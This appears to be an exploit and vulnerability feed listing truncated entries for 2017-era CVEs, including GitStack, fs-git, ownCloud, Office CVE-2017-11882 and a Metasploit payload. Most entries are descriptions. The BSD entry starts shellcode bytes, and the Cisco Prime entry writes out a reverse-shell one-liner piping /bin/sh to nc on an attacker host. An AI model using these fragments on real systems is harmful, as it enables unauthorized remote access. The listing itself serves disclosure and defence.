GitStack 2.3.10 Remote Code Execution

Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution Date: 18.01.2018 Software Link: https://gitstack.com/ Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl/ Category: remote 1. Description $SERVER'PHPAUTHPW' is directly passed t...

BSD/x86 - setreuid(geteuid(), geteuid()) + execve(/bin/sh) Shellcode (36 bytes)

/ bsd/x86 setreuid/exec shellcode setreuidgeteuid, geteuid and execve"/bin/sh", "/bin/sh", 0 shellcode based on hkpco's setreuid/exec shellcode for linux Tested on FreeBSD / include include char shellcode = "\x31\xc0\xb0\x19\x50\xcd\x80\x50" "\x50\x31\xc0\xb0\x7e\x50\xcd\x80" // setreuidgeteuid,...

Advantech WebAccess webvrpcs drawsrv Untrusted Pointer Dereference Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2780 IOCTL in the webvrpcs process. The issue results...

Command Injection

fs-git is vulnerable to command injection attacks. These attacks are possible because the buildCommand function doesn't sanitize data before constructing exec strings, allowing attackers to insert and execute commands...

CVE-2017-1000451

fs-git is a file system like api for git repository. The fs-git version 1.0.1 module relies on childprocess.exec, however, the buildCommand method used to construct exec strings does not properly sanitize data and is vulnerable to command injection across all methods that use it and call exec...

ownCloud: OS Command Injection via tainted PATH environment variable in findBinaryPath

The PATH environment variable is passed to the find command in owncloud/core/blob/master/lib/private/legacy/helper.php on line 543 is not sanitized for input. If an adversary is able to taint the PATH environment variable, OS command execution is possible utilizing the find command's execute -exe...

Out-of-bounds

An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Intel Graphics Driver" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service out-of-bounds read via a crafted app...

UBUNTU-CVE-2017-17533

DISPUTED default.tcl in Tkabber 1.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a third party has indicated that the attack cannot occur...

CVE-2017-17533

default.tcl in Tkabber 1.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a third party has indicated that the attack cannot occur because of th...

OSX Meterpreter, Reverse HTTP Inline

Run the Meterpreter / Mettle server payload stageless This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Module generated by tools/modules/generatemettlepayloads.rb module MetasploitModule CachedSize = 815032 include...

Microsoft Office - OLE Remote Code Execution Exploit

Exploit for windows platform in category remote exploits Source: https://github.com/embedi/CVE-2017-11882 CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882 Research:...

CVE-2017-0834

A remote code execution vulnerability in the Android media framework libmpeg2. Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63125953...

CVE-2017-10948

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.2.1.6871. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the...

Unauthenticated Remote Code Execution Vulnerability

Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, when running Ruby 1.9.3 or later, allows remote attackers to execute arbitrary code via vectors related to "serialized attributes."...

The vulnerability of the SSL software used in Backup Exec’s backup and recovery services allows attackers to execute arbitrary code or trigger a service failure.

The vulnerability of Backup Exec’s SSL software for backup and restoration services relates to the use of memory after it is freed i.e., after the agent completes its tasks. Exploiting this vulnerability could allow a malicious actor to execute arbitrary code or cause service failures using...

DiskBoss Enterprise 8.4.16 - Local Buffer Overflow

DiskBoss Enterprise 8.4.16 - Local Buffer Overflow !/usr/bin/python ======================================================================================================================== Exploit Author: C4t0ps1s Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer OverflowCode execution Date...

Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution

Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc $ATTACKER $PORT /tmp/f"...

September 19, 2017 – Morning Cyber Coffee Headlines – “Space Jam” Edition

Good morning! Sit with Carbon Black this morning over a cup of coffee or tea and browse a few industry headlines to get the day started. We’ve got just enough information below to get you through that first cup…enjoy! September 19, 2017 - Headlines State, Federal Authorities Proposing New Rules o...

OWASPZAP v2.5.0 - Remote Code Execution Vulnerability

Document Title: =============== OWASPZAP v2.5.0 - Remote Code Execution Vulnerability References: =========== https://www.vulnerability-lab.com/getcontent.php?id=2096 Video: https://www.youtube.com/watch?v=41gr2XhSOw Release Date: ============= 2017-09-18 Vulnerability Laboratory ID VL-ID:...

Fedora 26 : xen (2017-b7f1197c23)

Qemu: usb: ohci: infinite loop due to incorrect return value CVE-2017-9330 1457698 Qemu: nbd: segmentation fault due to client non-negotiation CVE-2017-9524 1460173 Qemu: qemu-nbd: server breaks with SIGPIPE upon client abort CVE-2017-10664 1466466 Qemu: exec: oob access during dma operation...